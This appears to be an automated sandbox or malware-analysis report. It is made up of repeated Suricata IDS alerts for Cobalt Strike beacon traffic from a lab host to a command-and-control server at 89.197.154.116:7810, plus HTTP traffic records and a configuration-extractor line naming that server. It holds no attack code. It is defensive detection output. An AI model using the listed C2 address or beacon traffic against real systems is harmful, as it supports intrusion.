            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50068 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50086 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50063 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49999 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50091 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49999 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50077 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50077 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50071 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50083 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50071 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50091 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50076 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50076 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50094 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50094 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50115 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50115 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50067 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50067 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50064 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50064 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50126 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50126 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50062 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50105 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50105 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50075 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50075 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50074 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50112 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50083 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50074 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50120 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50112 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50079 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50079 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50117 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50081 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50127 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50081 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50120 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50117 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50062 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50047 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50047 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50090 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50102 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50078 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50102 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50092 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50090 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50092 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50097 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50097 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50061 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50116 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50125 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50109 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50125 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50088 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50109 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50122 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50135 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50088 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50093 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50078 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50104 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50085 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50116 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49918 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50099 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50110 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50129 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50106 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50135 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50095 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50095 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50096 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50096 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50127 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50104 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50085 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50087 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50110 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50101 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50101 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50128 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50134 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50134 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50099 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49906 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49906 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50106 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50129 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50093 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50061 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49918 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50132 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50087 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50107 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50107 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50122 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50132 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50111 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50111 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50119 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50119 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50108 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50108 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50113 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50113 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50066 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50031 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50031 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50103 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50065 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50128 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50065 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50022 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50121 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50131 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50130 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50130 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50084 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50131 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50118 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50022 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50118 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50133 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50098 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50133 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50121 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50103 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50066 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50098 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50084 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50124 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50114 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50114 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50124 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50089 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50089 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50123 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50123 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50082 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50082 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50100 -> 89.197.154.116:7810
            Source: Network trafficSuricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50100 -> 89.197.154.116:7810
            Source: Malware configuration extractorURLs: 89.197.154.116
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 7810
